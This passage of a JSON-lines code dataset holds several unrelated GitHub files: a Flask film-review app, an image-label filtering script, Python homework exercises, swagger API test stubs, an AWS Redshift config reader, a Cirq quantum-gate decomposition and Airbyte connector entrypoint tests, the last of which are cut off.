AddFilm\n\n\n@app.route('/', methods=['GET','POST'])\n\n@app.route('/home', methods=['GET','POST'])\ndef home():\n all_reviews = Review.query.all()\n all_film = Film.query.all()\n print(all_reviews)\n return render_template('home.html', title=\"Home\", all_reviews=all_reviews, all_film=all_film)\n\n@app.route('/addfilm', methods=['GET', 'POST'])\ndef 
addfilm():\n    form = AddFilm()\n    if request.method == 'POST':\n        if form.validate_on_submit():\n            new_film = Film(\n                title = form.title.data,\n                description = form.description.data,\n                released_at = form.released_at.data,\n                age_rating = form.age_rating.data\n            )\n\n            db.session.add(new_film)\n            db.session.commit()\n            return redirect(url_for(\"home\"))\n    return render_template('addfilm.html', title=\"Add a Film\", form=form)\n\n\n@app.route('/addreview', methods=['GET','POST'])\ndef addreview():\n    form = AddReview()\n    form.film_title.choices = [(film.id, film.title) for film in Film.query.all()]\n    if request.method == 'POST':\n        if form.validate_on_submit():\n            new_review = Review(\n                film_id = form.film_title.data,\n                author = form.author.data,\n                review = form.review.data,\n                rating = form.rating.data\n            )\n\n            db.session.add(new_review)\n            db.session.commit()\n            return redirect(url_for(\"home\"))\n    return render_template('add_review.html', title='Add a Review', form=form)\n\n@app.route(\"/update/<int:id>\", methods=[\"GET\", \"POST\"])\ndef update(id):\n    form = AddReview()\n    form.film_title.choices = [(film.id, film.title) for film in Film.query.all()]\n    review = Review.query.filter_by(id=id).first()\n    if request.method == \"POST\":\n        review.film_id = form.film_title.data\n        review.author = form.author.data\n        review.review = form.review.data\n        review.rating = form.rating.data\n        db.session.commit()\n        return redirect(url_for(\"home\"))\n\n    return render_template(\"update.html\", form=form, title=\"Update Review\", review=review)\n\n@app.route(\"/updatefilm/<int:id>\", methods=[\"GET\", \"POST\"])\ndef updatefilm(id):\n    form = AddFilm()\n    film = Film.query.filter_by(id=id).first()\n    if request.method == \"POST\":\n        film.title = form.title.data\n        film.description = form.description.data\n        film.released_at = form.released_at.data\n        film.age_rating = form.age_rating.data\n        db.session.commit()\n        return redirect(url_for(\"home\"))\n\n    return render_template(\"updatefilm.html\", form=form, title=\"Update Film\", film=film)\n\n@app.route('/deletereview/<int:id>', methods=[\"GET\", \"POST\"])\ndef deletereview(id):\n    reviewtodelete = Review.query.get(id)\n    db.session.delete(reviewtodelete)\n    db.session.commit()\n    return redirect(url_for('home'))\n\n@app.route('/deletefilm/<int:id>', methods=[\"GET\", \"POST\"])\ndef deletefilm(id):\n    filmtodelete = Film.query.get(id)\n    db.session.delete(filmtodelete)\n    db.session.commit()\n    return redirect(url_for('home'))\n\n@app.route('/filmlist', methods=['GET','POST'])\ndef filmlist():\n    all_films = Film.query.all()\n    print(all_films)\n    return render_template(\"filmlist.html\", title=\"Film List\", all_films=all_films)\n\n@app.route('/count', methods=[\"GET\", \"POST\"])\ndef count():\n    number_of_reviews = Review.query.count()\n    print(number_of_reviews)\n    db.session.commit()\n    return render_template(\"count.html\", title=\"Count\", number_of_reviews=number_of_reviews)","repo_name":"sc18kg/first-qa-project","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26149845883","text":"import pandas as pd\nimport os\nfrom shutil import copyfile\n\nFePh_base_path = \"/Users/chbh01/Documents/OfflineCodebases/DFKI_Hiwi/ACG/EASIER/Datasets/FePh/\"\ny_df = pd.read_csv(os.path.join(FePh_base_path, \"FePh_labels.csv\"))\nimages_dir = os.path.join(FePh_base_path, \"FePh_images\")\n\ndestination_folder = 
\"FePh_images-single-labels-only\"\nos.makedirs(os.path.join(FePh_base_path, destination_folder))\ny_df.dropna(inplace=True)\n# Extracting multiple labels\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: [int(i) for i in x])\ny_df['num_labels'] = y_df['Facial_label'].apply(lambda x: len(x))\n# Removing all data points with more than one labels ==> Ambiguous\ny_df = y_df[y_df[\"num_labels\"] == 1]\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: x[0]).to_numpy()\nprint(y_df[\"External ID\"].values.shape)\n\nfor f in y_df[\"External ID\"]:\n try:\n copyfile(os.path.join(images_dir, f), os.path.join(FePh_base_path, destination_folder, f))\n except FileNotFoundError:\n copyfile(os.path.join(images_dir, f + \".png\"), os.path.join(FePh_base_path, destination_folder, f + \".png\"))\n\ny_df.to_csv(\"FePh_labels_single_label_only.csv\")\n","repo_name":"DFKI-SignLanguage/EASIER-EkmanClassifier","sub_path":"Scripts/gen_FePh_fullset_onlysinglelabels.py","file_name":"gen_FePh_fullset_onlysinglelabels.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8022296312","text":"from tkinter import TRUE\r\nimport operator\r\n\r\ndef sort_by_occurrence(nums):\r\n \"\"\"按照 list 物件 nums 里的各元素出现次数,进行递增排序\"\"\"\r\n # 把你的程式码放在这里\r\n a = {} \r\n for i in input_list:\r\n if input_list.count(i)>0:\r\n a[i]= input_list.count(i) #出现次数\r\n a = sorted(a.items(),key=operator.itemgetter(1)) #排序\r\n res = []\r\n for item in a:\r\n res.append(item[0])\r\n return res\r\n\r\nif __name__ == '__main__':\r\n # 只有当这个 py 档案以 Python 直译器执行时,才会执行到以下程式码。\r\n # 若是把这个 py 档案做为模组来汇入,不会执行到以下程式码。\r\n input_list = [7,7,7,8,1,1]\r\n output_list = sort_by_occurrence(input_list)\r\n print(output_list)\r\n\r\n\r\n#留言板","repo_name":"EEB113A/hw3-Code-Review","sub_path":"1070327_王云晨.py","file_name":"1070327_王云晨.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5641923378","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom swagger_server.models.cid import Cid # noqa: E501\nfrom swagger_server.models.componentsresponses_not_foundcontentapplication1problem2_bxmlschema import ComponentsresponsesNotFoundcontentapplication1problem2Bxmlschema # noqa: E501\nfrom swagger_server.models.create_cid_set_file_request import CreateCidSetFileRequest # noqa: E501\nfrom swagger_server.models.create_cid_set_file_response import CreateCidSetFileResponse # noqa: E501\nfrom swagger_server.models.create_sync_verification_request import CreateSyncVerificationRequest # noqa: E501\nfrom swagger_server.models.create_sync_verification_response import CreateSyncVerificationResponse # noqa: E501\nfrom swagger_server.models.get_cid_set_file_response import GetCidSetFileResponse # noqa: E501\nfrom swagger_server.models.get_entry_by_cid_response import GetEntryByCidResponse # noqa: E501\nfrom swagger_server.models.inline_response404 import InlineResponse404 # noqa: E501\nfrom swagger_server.models.key_type import KeyType # noqa: E501\nfrom swagger_server.models.list_cid_set_events_response import ListCidSetEventsResponse # noqa: E501\nfrom swagger_server.test import BaseTestCase\n\n\nclass TestReconciliationController(BaseTestCase):\n \"\"\"ReconciliationController integration test stubs\"\"\"\n\n def test_create_cid_set_file(self):\n \"\"\"Test case for create_cid_set_file\n\n 
Criar Arquivo de CIDs\n \"\"\"\n body = CreateCidSetFileRequest()\n response = self.client.open(\n '/api/v1-rc5//cids/files/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_create_sync_verification(self):\n \"\"\"Test case for create_sync_verification\n\n Verificar Sincronismo\n \"\"\"\n body = CreateSyncVerificationRequest()\n response = self.client.open(\n '/api/v1-rc5//sync-verifications/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_cid_set_file(self):\n \"\"\"Test case for get_cid_set_file\n\n Consultar Arquivo de CIDs\n \"\"\"\n headers = [('pi_requesting_participant', 'pi_requesting_participant_example')]\n response = self.client.open(\n '/api/v1-rc5//cids/files/{Id}'.format(id=56),\n method='GET',\n headers=headers)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_entry_by_cid(self):\n \"\"\"Test case for get_entry_by_cid\n\n Consultar Vínculo por CID\n \"\"\"\n response = self.client.open(\n '/api/v1-rc5//cids/entries/{Cid}'.format(cid=Cid()),\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_list_cid_set_events(self):\n \"\"\"Test case for list_cid_set_events\n\n Listar Eventos de CIDs\n \"\"\"\n query_string = [('participant', 'participant_example'),\n ('key_type', KeyType()),\n ('start_time', '2013-10-20T19:20:30+01:00'),\n ('end_time', '2013-10-20T19:20:30+01:00'),\n ('limit', 56)]\n response = self.client.open(\n '/api/v1-rc5//cids/events',\n method='GET',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n import unittest\n unittest.main()\n","repo_name":"legiti/pix-dict-api","sub_path":"flask/swagger_server/test/test_reconciliation_controller.py","file_name":"test_reconciliation_controller.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"10029945564","text":"import configparser\n\n\nclass AWSIdentity:\n def __init__(self, config_file_path):\n \"\"\"\n Get AWS KEY, SECRET, and TOKEN in config file\n :param config_file_path: Path lead to AWS credential config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.aws_identity = dict()\n\n self.__get_aws_identity()\n\n def __get_aws_identity(self):\n self.aws_identity['aws_key'] = self.config.get('AWS', 'KEY')\n self.aws_identity['aws_secret'] = self.config.get('AWS', 'SECRET')\n self.aws_identity['aws_token'] = self.config.get('AWS', 'TOKEN')\n\n\nclass AWSCluster:\n def __init__(self, config_file_path):\n \"\"\"\n Get all required info for AWS S3, Redshift Cluster, and Database in config file\n :param config_file_path: Path lead to AWS S3, Redshift Cluster, and Database config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.cluster_info = dict()\n\n self.__get_cluster_info()\n\n def __get_cluster_info(self):\n # Cluster configuration\n self.cluster_info['dwh_cluster_identifier'] = self.config.get(\"DWH\", \"CLUSTER_IDENTIFIER\")\n self.cluster_info['dwh_cluster_type'] = self.config.get(\"DWH\", \"CLUSTER_TYPE\")\n self.cluster_info['dwh_num_nodes'] 
= self.config.get(\"DWH\", \"NUM_NODES\")\n self.cluster_info['dwh_node_type'] = self.config.get(\"DWH\", \"NODE_TYPE\")\n\n # Database info\n self.cluster_info['dwh_db'] = self.config.get(\"CLUSTER\", \"DB_NAME\")\n self.cluster_info['dwh_db_user'] = self.config.get(\"CLUSTER\", \"DB_USER\")\n self.cluster_info['dwh_db_password'] = self.config.get(\"CLUSTER\", \"DB_PASSWORD\")\n self.cluster_info['dwh_port'] = self.config.get(\"CLUSTER\", \"DB_PORT\")\n self.cluster_info['dwh_host'] = self.config.get(\"CLUSTER\", \"HOST\")\n self.cluster_info['dwh_region'] = self.config.get(\"DWH\", \"REGION\")\n\n # S3 info\n self.cluster_info['s3_log_data'] = self.config.get('S3', 'log_data')\n self.cluster_info['s3_log_jsonpath'] = self.config.get('S3', 'log_jsonpath')\n self.cluster_info['s3_song_data'] = self.config.get('S3', 'song_data')\n\n # IAM role\n self.cluster_info['dwh_iam_role_name'] = self.config.get(\"DWH\", \"IAM_ROLE_NAME\")\n self.cluster_info['dwh_iam_arn'] = self.config.get(\"IAM_ROLE\", \"ARN\")\n\n","repo_name":"xzbits/project3_DE_ND","sub_path":"aws_identity_redshift_cluster_config.py","file_name":"aws_identity_redshift_cluster_config.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20837569319","text":"# Напишите программу, которая по заданному номеру четверти \n# показывает диапазон возможных координат точек в этой четверти (x и y).\n\n# print('Введите номер четверти')\n# n = int(input())\n# if n == 1:\n# print('x = (0; +∞) y = (0; +∞)')\n# elif n == 2:\n# print('x = (0; +∞) y = (-∞; 0)')\n# elif n == 3:\n# print('x = (-∞; 0) y = (-∞; 0)')\n# elif n == 4:\n# print('x = (-∞; 0) y = (0; +∞)')\n\nnumber = int(input()) # на строку ниже создаем словарь по ключу\nd = {1: 'x = (0; +∞) y = (0; +∞)', 2: 'x = (0; +∞) y = (-∞; 0)', 3: 'x = (-∞; 0) y = (-∞; 0)', 4: 'x = (-∞; 0) y = (0; +∞)'}\nprint(d[number])","repo_name":"IljaBoroznov/pithon_homework","sub_path":"Homework_1/Task_3.py","file_name":"Task_3.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"21908624978","text":"from typing import List, Tuple\n\nimport numpy as np\nimport cirq\nfrom cirq import optimizers\n\n\ndef matrix_to_sycamore_operations(\n target_qubits: List[cirq.GridQubit], matrix: np.ndarray\n) -> Tuple[cirq.OP_TREE, List[cirq.GridQubit]]:\n \"\"\"A method to convert a unitary matrix to a list of Sycamore operations.\n\n This method will return a list of `cirq.Operation`s using the qubits and (optionally) ancilla\n qubits to implement the unitary matrix `matrix` on the target qubits `qubits`.\n The operations are also supported by `cirq.google.gate_sets.SYC_GATESET`.\n\n Args:\n target_qubits: list of qubits the returned operations will act on. The qubit order defined by the list\n is assumed to be used by the operations to implement `matrix`.\n matrix: a matrix that is guaranteed to be unitary and of size (2**len(qs), 2**len(qs)).\n Returns:\n A tuple of operations and ancilla qubits allocated.\n Operations: In case the matrix is supported, a list of operations `ops` is returned.\n `ops` acts on `qs` qubits and for which `cirq.unitary(ops)` is equal to `matrix` up\n to certain tolerance. In case the matrix is not supported, it might return NotImplemented to\n reduce the noise in the judge output.\n Ancilla qubits: In case ancilla qubits are allocated a list of ancilla qubits. 
Otherwise\n an empty list.\n .\n \"\"\"\n num_of_qubits = len(target_qubits)\n\n if np.all(np.equal(matrix, np.eye(2 ** num_of_qubits))):\n # Simple Identity Check\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\n if num_of_qubits == 1:\n # single qubit gates\n gate = optimizers.single_qubit_matrix_to_phxz(matrix)\n cirq.google.Sycamore.validate_operation(gate(target_qubits[0]))\n return [gate(target_qubits[0])], []\n\n elif num_of_qubits == 2:\n # two qubit gates\n ops_list = optimizers.two_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], matrix,\n allow_partial_czs=True)\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n converted_ops_list = ConvertToSycamoreGates.convert(op=ops_list)\n return converted_ops_list, []\n\n elif is_incremental(matrix):\n ancilla = find_neighbor_available_qubit(target_qubits)\n return decompose_incrementer_matrix(target_qubits, ancilla), [ancilla]\n\n elif num_of_qubits == 3:\n # three qubit gates\n ops_list = optimizers.three_qubit_matrix_to_operations(target_qubits[0], target_qubits[1], target_qubits[2],\n matrix)\n\n return ops_list, []\n\n elif np.count_nonzero(matrix - np.diag(np.diagonal(matrix))) == 0:\n # diagonal gates with more than 3 qubits\n angle_list = []\n for i in np.arange(np.shape(matrix)[0]):\n angle_list.append(np.angle(matrix[i, i]))\n diagonal_gate = cirq.ops.DiagonalGate(angle_list)\n ops_list = diagonal_gate._decompose_(qubits=target_qubits)\n\n return ops_list, []\n\n elif num_of_qubits == 4:\n ancilla = find_neighbor_available_qubit(target_qubits)\n CTOFFLI_mat = cirq.unitary(\n cirq.ops.ControlledOperation(controls=[target_qubits[0], target_qubits[1], target_qubits[2]],\n sub_operation=cirq.X(target_qubits[3])))\n if np.all(np.equal(matrix, CTOFFLI_mat)):\n ops_list = []\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[target_qubits[2], target_qubits[1], target_qubits[0]], target=target_qubits[3],\n free_qubits=[ancilla])\n ops_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n return ops_list, [ancilla]\n\n\n else:\n ops_list = []\n for qubit in target_qubits:\n op = cirq.Z(qubit) ** 0\n cirq.google.Sycamore.validate_operation(op)\n ops_list.append(cirq.Z(qubit) ** 0)\n return ops_list, []\n\ndef is_incremental(mat):\n mat_new = np.zeros([np.shape(mat)[0], np.shape(mat)[1]])\n mat_new[0:-1, :] = mat[1:, :]\n mat_new[-1, :] = mat[0, :]\n\n return np.count_nonzero(mat_new - np.diag(np.diagonal(mat_new))) == 0\n\n\ndef decompose_incrementer_matrix(target_qubits, ancilla):\n ConvertToSycamoreGates = cirq.google.ConvertToSycamoreGates()\n num_of_qubits = len(target_qubits)\n # assume num_of_qubits>=3\n q = target_qubits[::-1]\n op_list = []\n\n if num_of_qubits > 7:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(\n controls=[q[0], q[1], q[2], q[3], q[4], q[5], q[6]],\n target=q[7], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 6:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4], q[5]],\n target=q[6], free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 5:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3], q[4]],\n target=q[5],\n 
free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 4:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2], q[3]], target=q[4],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n\n if num_of_qubits > 3:\n decomposed_ops = cirq.optimizers.decompose_multi_controlled_x(controls=[q[0], q[1], q[2]], target=q[3],\n free_qubits=[ancilla])\n op_list.append(ConvertToSycamoreGates.convert(decomposed_ops))\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.TOFFOLI(q[0], q[1], q[2])))\n\n op_list.append(ConvertToSycamoreGates.convert(op=cirq.CNOT(q[0], q[1])))\n\n op_list.append(cirq.X(q[0]))\n\n return op_list\n\ndef find_neighbor_available_qubit(target_qubits):\n for target_qubit in target_qubits:\n neighbor_qubits = target_qubit.neighbors()\n for neighbor_qubit in neighbor_qubits:\n if neighbor_qubit not in target_qubits:\n return neighbor_qubit\n\n","repo_name":"ziweiqiu/qchack-2021-challenge","sub_path":"solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6934,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20187226731","text":"import os\nfrom argparse import Namespace\nfrom copy import deepcopy\nfrom typing import Any, List, Mapping, MutableMapping, Union\nfrom unittest import mock\nfrom unittest.mock import MagicMock, patch\n\nimport pytest\nimport requests\nfrom airbyte_cdk import AirbyteEntrypoint\nfrom airbyte_cdk import entrypoint as entrypoint_module\nfrom airbyte_cdk.models import (\n AirbyteCatalog,\n AirbyteConnectionStatus,\n AirbyteControlConnectorConfigMessage,\n AirbyteControlMessage,\n AirbyteMessage,\n AirbyteRecordMessage,\n AirbyteStream,\n ConnectorSpecification,\n OrchestratorType,\n Status,\n SyncMode,\n Type,\n)\nfrom airbyte_cdk.sources import Source\n\n\nclass MockSource(Source):\n def read(self, **kwargs):\n pass\n\n def discover(self, **kwargs):\n pass\n\n def check(self, **kwargs):\n pass\n\n @property\n def message_repository(self):\n pass\n\n\ndef _as_arglist(cmd: str, named_args: Mapping[str, Any]) -> List[str]:\n out = [cmd]\n for k, v in named_args.items():\n out.append(f\"--{k}\")\n if v:\n out.append(v)\n return out\n\n\n@pytest.fixture\ndef spec_mock(mocker):\n expected = ConnectorSpecification(connectionSpecification={})\n mock = MagicMock(return_value=expected)\n mocker.patch.object(MockSource, \"spec\", mock)\n return mock\n\n\nMESSAGE_FROM_REPOSITORY = AirbyteMessage(\n type=Type.CONTROL,\n control=AirbyteControlMessage(\n type=OrchestratorType.CONNECTOR_CONFIG,\n emitted_at=10,\n connectorConfig=AirbyteControlConnectorConfigMessage(config={\"any config\": \"a config value\"}),\n ),\n)\n\n\n@pytest.fixture\ndef entrypoint(mocker) -> AirbyteEntrypoint:\n message_repository = MagicMock()\n message_repository.consume_queue.side_effect = [[message for message in [MESSAGE_FROM_REPOSITORY]], []]\n mocker.patch.object(MockSource, \"message_repository\", new_callable=mocker.PropertyMock, return_value=message_repository)\n return AirbyteEntrypoint(MockSource())\n\n\ndef test_airbyte_entrypoint_init(mocker):\n mocker.patch.object(entrypoint_module, \"init_uncaught_exception_handler\")\n AirbyteEntrypoint(MockSource())\n entrypoint_module.init_uncaught_exception_handler.assert_called_once_with(entrypoint_module.logger)\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\", \"expected_args\"],\n [\n (\"spec\", {\"debug\": \"\"}, 
{\"command\": \"spec\", \"debug\": True}),\n (\"check\", {\"config\": \"config_path\"}, {\"command\": \"check\", \"config\": \"config_path\", \"debug\": False}),\n (\"discover\", {\"config\": \"config_path\", \"debug\": \"\"}, {\"command\": \"discover\", \"config\": \"config_path\", \"debug\": True}),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"None\", \"debug\": False},\n ),\n (\n \"read\",\n {\"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": \"\"},\n {\"command\": \"read\", \"config\": \"config_path\", \"catalog\": \"catalog_path\", \"state\": \"state_path\", \"debug\": True},\n ),\n ],\n)\ndef test_parse_valid_args(cmd: str, args: Mapping[str, Any], expected_args, entrypoint: AirbyteEntrypoint):\n arglist = _as_arglist(cmd, args)\n parsed_args = entrypoint.parse_args(arglist)\n assert vars(parsed_args) == expected_args\n\n\n@pytest.mark.parametrize(\n [\"cmd\", \"args\"],\n [\n (\"check\", {\"config\": \"config_path\"}),\n (\"discover\", {\"config\": \"config_path\"}),\n (\"read\", {\"config\": \"config_path\", \"catalog\": \"catalog_path\"}),\n ],\n)\ndef test_parse_missing_required_args(cmd: str, args: MutableMapping[str, Any], entrypoint: AirbyteEntrypoint):\n required_args = {\"check\": [\"config\"], \"discover\": [\"config\"], \"read\": [\"config\", \"catalog\"]}\n for required_arg in required_args[cmd]:\n argcopy = deepcopy(args)\n del argcopy[required_arg]\n with pytest.raises(BaseException):\n entrypoint.parse_args(_as_arglist(cmd, argcopy))\n\n\ndef _wrap_message(submessage: Union[AirbyteConnectionStatus, ConnectorSpecification, AirbyteRecordMessage, AirbyteCatalog]) -> str:\n if isinstance(submessage, AirbyteConnectionStatus):\n message = AirbyteMessage(type=Type.CONNECTION_STATUS, connectionStatus=submessage)\n elif isinstance(submessage, ConnectorSpecification):\n message = AirbyteMessage(type=Type.SPEC, spec=submessage)\n elif isinstance(submessage, AirbyteCatalog):\n message = AirbyteMessage(type=Type.CATALOG, catalog=submessage)\n elif isinstance(submessage, AirbyteRecordMessage):\n message = AirbyteMessage(type=Type.RECORD, record=submessage)\n else:\n raise Exception(f\"Unknown message type: {submessage}\")\n\n return message.json(exclude_unset=True)\n\n\ndef test_run_spec(entrypoint: AirbyteEntrypoint, mocker):\n parsed_args = Namespace(command=\"spec\")\n expected = ConnectorSpecification(connectionSpecification={\"hi\": \"hi\"})\n mocker.patch.object(MockSource, \"spec\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n\n\n@pytest.fixture\ndef config_mock(mocker, request):\n config = request.param if hasattr(request, \"param\") else {\"username\": \"fake\"}\n mocker.patch.object(MockSource, \"read_config\", return_value=config)\n mocker.patch.object(MockSource, \"configure\", return_value=config)\n return config\n\n\n@pytest.mark.parametrize(\n \"config_mock, schema, config_valid\",\n [\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"name\": {\"type\": \"string\"}}, \"additionalProperties\": False}, False),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": 
{\"user\": {\"type\": \"string\"}}}, True),\n ({\"username\": \"fake\"}, {\"type\": \"object\", \"properties\": {\"user\": {\"type\": \"string\", \"airbyte_secret\": True}}}, True),\n (\n {\"username\": \"fake\", \"_limit\": 22},\n {\"type\": \"object\", \"properties\": {\"username\": {\"type\": \"string\"}}, \"additionalProperties\": False},\n True,\n ),\n ],\n indirect=[\"config_mock\"],\n)\ndef test_config_validate(entrypoint: AirbyteEntrypoint, mocker, config_mock, schema, config_valid):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n mocker.patch.object(MockSource, \"spec\", return_value=ConnectorSpecification(connectionSpecification=schema))\n\n messages = list(entrypoint.run(parsed_args))\n if config_valid:\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n else:\n assert len(messages) == 2\n assert messages[0] == MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)\n connection_status_message = AirbyteMessage.parse_raw(messages[1])\n assert connection_status_message.type == Type.CONNECTION_STATUS\n assert connection_status_message.connectionStatus.status == Status.FAILED\n assert connection_status_message.connectionStatus.message.startswith(\"Config validation error:\")\n\n\ndef test_run_check(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n check_value = AirbyteConnectionStatus(status=Status.SUCCEEDED)\n mocker.patch.object(MockSource, \"check\", return_value=check_value)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(check_value)] == messages\n assert spec_mock.called\n\n\ndef test_run_check_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"check\", config=\"config_path\")\n mocker.patch.object(MockSource, \"check\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_discover(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n expected = AirbyteCatalog(streams=[AirbyteStream(name=\"stream\", json_schema={\"k\": \"v\"}, supported_sync_modes=[SyncMode.full_refresh])])\n mocker.patch.object(MockSource, \"discover\", return_value=expected)\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True), _wrap_message(expected)] == messages\n assert spec_mock.called\n\n\ndef test_run_discover_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"discover\", config=\"config_path\")\n mocker.patch.object(MockSource, \"discover\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_run_read(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n expected = AirbyteRecordMessage(stream=\"stream\", data={\"data\": \"stuff\"}, emitted_at=1)\n 
mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", return_value=[AirbyteMessage(record=expected, type=Type.RECORD)])\n\n messages = list(entrypoint.run(parsed_args))\n\n assert [_wrap_message(expected), MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n assert spec_mock.called\n\n\ndef test_run_read_with_exception(entrypoint: AirbyteEntrypoint, mocker, spec_mock, config_mock):\n parsed_args = Namespace(command=\"read\", config=\"config_path\", state=\"statepath\", catalog=\"catalogpath\")\n mocker.patch.object(MockSource, \"read_state\", return_value={})\n mocker.patch.object(MockSource, \"read_catalog\", return_value={})\n mocker.patch.object(MockSource, \"read\", side_effect=ValueError(\"Any error\"))\n\n with pytest.raises(ValueError):\n messages = list(entrypoint.run(parsed_args))\n assert [MESSAGE_FROM_REPOSITORY.json(exclude_unset=True)] == messages\n\n\ndef test_invalid_command(entrypoint: AirbyteEntrypoint, config_mock):\n with pytest.raises(Exception):\n list(entrypoint.run(Namespace(command=\"invalid\", config=\"conf\")))\n\n\n@pytest.mark.parametrize(\n \"deployment_mode, url, expected_error\",\n [\n pytest.param(\"CLOUD\", \"https://airbyte.com\", None, id=\"test_cloud_public_endpoint_is_successful\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30\", ValueError, id=\"test_cloud_private_ip_address_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://localhost:8080/api/v1/cast\", ValueError, id=\"test_cloud_private_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"http://past.lives.net/api/v1/inyun\", ValueError, id=\"test_cloud_unsecured_endpoint_is_rejected\"),\n pytest.param(\"CLOUD\", \"https://not:very/cash:443.money\", ValueError, id=\"test_cloud_invalid_url_format\"),\n pytest.param(\"CLOUD\", \"https://192.168.27.30 \", ValueError, id=\"test_cloud_incorrect_ip_format_is_rejected\"),\n 